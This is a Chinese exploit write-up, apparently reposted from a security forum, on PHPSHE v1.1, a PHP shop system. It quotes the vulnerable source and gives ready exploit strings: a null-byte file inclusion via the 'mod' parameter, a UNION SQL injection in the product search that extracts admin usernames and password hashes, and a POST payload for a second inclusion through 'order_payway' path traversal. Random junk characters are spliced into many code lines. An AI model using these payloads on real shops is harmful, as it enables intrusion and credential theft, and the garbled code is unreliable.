phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
/* Phpshe v1.1 Vulnerability
' k+ F/ i% i) h0 G8 N' H$ Y" J/* ========================
( k  `/ x4 l' r$ L* r' \/* By: : Kn1f3
& ?  f% I5 A8 H" l% i. p8 D+ ^7 @/* E-Mail : 681796@qq.com
/*******************************************************/
2 N- C. Y7 Y) n$ }; X0 O9 T0×00 整体大概参数传输
# A7 M8 A, Q$ a
. g8 K/ S: k' Z1 i4 E

8 F6 v; q$ i1 D6 g+ j( \7 k//common.php
# p! }1 s8 o! v8 ]if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
, L" Y6 m, t8 u8 K6 N" U: v!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
% x$ W0 Q5 X. T0 X) ?session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
( {4 `4 B! S  l+ H. z' M% ?
3 m' w; s$ I0 O0 ~$ X' |# J+ H9 m0×01 包含漏洞
! l9 q- `( ?: k
( o, N# Q/ w" l! l2 c
" a8 V; Z5 O! n1 z  x/ l$ N$ x//首页文件
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
5 Z: a* r3 p, Tinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
$ p& @0 k2 c/ U" [; Q; h. lpe_result();
7 }+ b  s3 e# C9 ~% z?>
9 m& h! V& Y& X! J* ^8 O//common 文件 第15行开始
! q2 }5 @: N" w1 [( ]. K- G2 |url路由配置
; s( b: f2 |: N0 N+ X  C2 ]& ?# s$module = $mod = $act = 'index';
/ A+ [) g7 t6 [  c3 I5 }+ ?# W$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

0×02 搜索注入
; Z' D4 s0 y9 B: _: `% g% E
+ U2 }4 Y( t, y<code id="code2">

//product.php文件
! r/ v3 P& p1 {case 'list':
- k8 h; ]/ G1 p/ t2 u5 K% W: S$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
/ _. G, k  @, r: i: L//搜索
9 V; j* f# N) O1 O, }5 J: @3 R$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
/ z( ]8 I/ X3 Tif ($category_id) {
5 L6 x5 ]. L- bwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
0 }+ m2 L- J, ]. I$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
0 x3 }" B6 i& A7 N2 v7 r* D) A$orderby = explode('_', $_g_orderby);
$ ]9 d9 I# `4 u& H9 f$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
: r" q7 e; b. qelse {
" t3 d- z& Q+ ~2 Z1 Z$sqlwhere .= " order by `product_id` desc";
2 h* s  b% n# ]9 z! `( `}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
: }# e1 m: H5 X) d//热卖排行
$product_hotlist = product_hotlist();
8 _, d% j" O9 q  Y! T1 H//当前路径
$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
- M4 }: y* G( K2 q{
//处理条件语句
$sqlwhere = $this->_dowhere($where);
* [, ?# o$ m, |2 \; [$ M! preturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
- v: v8 Y  L5 x- ?/ Z}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
% W2 h# r$ Q5 m6 H

</code>

' z" M" I$ x( b* W+ z0×03 包含漏洞2
# v; Q6 x% U% I/ x) }
<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

$cache_payway = cache::get('payway');

foreach($cache_payway as $k => $v) {

3 P$ X6 B) `, ]! j' d5 q& E$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 j+ f. q0 o9 Z2 T; f2 D# u( Aif ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}

}

$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

!$order['order_id'] && pe_error('订单号错误...');

- q% j) m( i1 Z# B, R$ Vif (isset($_p_pesubmit)) {

7 l: [; t5 ~6 k+ R$ {if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

* T/ G+ q) F. f/ }( n0 F8 V$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

$order['order_name'] .= "{$v['product_name']};";
2 t* c* B4 _5 a: ^( ?8 B

, A4 Z' O  {  ~: p; O}

0 E% M: F% A  L3 p& y( Z) I! u; ]  ~echo '正在为您连接支付网站，请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

" q+ U# ^" _2 q( jpe_error('支付错误...');

}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
* Q: ~% }9 l) J1 I. {! Yhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg